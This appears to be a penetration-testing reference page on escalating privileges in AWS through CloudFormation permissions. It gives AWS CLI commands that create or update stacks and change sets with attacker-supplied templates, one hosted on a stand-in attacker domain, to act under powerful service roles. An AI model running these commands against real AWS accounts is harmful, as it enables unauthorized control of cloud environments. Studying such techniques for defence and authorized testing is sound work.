AWS - Cloudformation Privesc

cloudformation

For more information about cloudformation check:

iam:PassRole, cloudformation:CreateStack

An attacker with these permissions can escalate privileges by crafting a CloudFormation stack with a custom template, hosted on their server, to execute actions under the permissions of a specified role:

aws cloudformation create-stack --stack-name <stack-name> \
    --template-url http://attacker.com/attackers.template \
    --role-arn <arn-role>

In the following page you have an exploitation example with the additional permission cloudformation:DescribeStacks:

Potential Impact: Privesc to the cloudformation service role specified.

iam:PassRole, (cloudformation:UpdateStack | cloudformation:SetStackPolicy)

In this case you can abuse an existing cloudformation stack to update it and escalate privileges as in the previous scenario:

aws cloudformation update-stack \
    --stack-name privesc \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
    --capabilities CAPABILITY_IAM \
    --region eu-west-1 

The cloudformation:SetStackPolicy permission can be used to give yourself UpdateStack permission over a stack and perform the attack.

Potential Impact: Privesc to the cloudformation service role specified.

cloudformation:UpdateStack | cloudformation:SetStackPolicy

If you have this permission but no iam:PassRole you can still update the stacks used and abuse the IAM Roles they have already attached. Check the previous section for exploit example (just don't indicate any role in the update).

The cloudformation:SetStackPolicy permission can be used to give yourself UpdateStack permission over a stack and perform the attack.

Potential Impact: Privesc to the cloudformation service role already attached.

iam:PassRole,((cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

An attacker with permissions to pass a role and create & execute a ChangeSet can create/update a new cloudformation stack abuse the cloudformation service roles just like with the CreateStack or UpdateStack.

The following exploit is a variation of the CreateStack one using the ChangeSet permissions to create a stack.

aws cloudformation create-change-set \
    --stack-name privesc \
    --change-set-name privesc \
    --change-set-type CREATE \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role arn:aws:iam::947247140022:role/CloudFormationAdmin \
    --capabilities CAPABILITY_IAM \
    --region eu-west-1

echo "Waiting 2 mins to change the stack"
sleep 120

aws cloudformation execute-change-set \
    --change-set-name privesc \
    --stack-name privesc \
    --region eu-west-1

echo "Waiting 2 mins to execute the stack"
sleep 120

aws cloudformation describe-stacks \
    --stack-name privesc \
    --region eu-west-1

The cloudformation:SetStackPolicy permission can be used to give yourself ChangeSet permissions over a stack and perform the attack.

Potential Impact: Privesc to cloudformation service roles.

(cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

This is like the previous method without passing IAM roles, so you can just abuse already attached ones, just modify the parameter:

--change-set-type UPDATE

Potential Impact: Privesc to the cloudformation service role already attached.

iam:PassRole,(cloudformation:CreateStackSet | cloudformation:UpdateStackSet)

An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles.

Potential Impact: Privesc to cloudformation service roles.

cloudformation:UpdateStackSet

An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles.

Potential Impact: Privesc to the attached cloudformation roles.

References

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/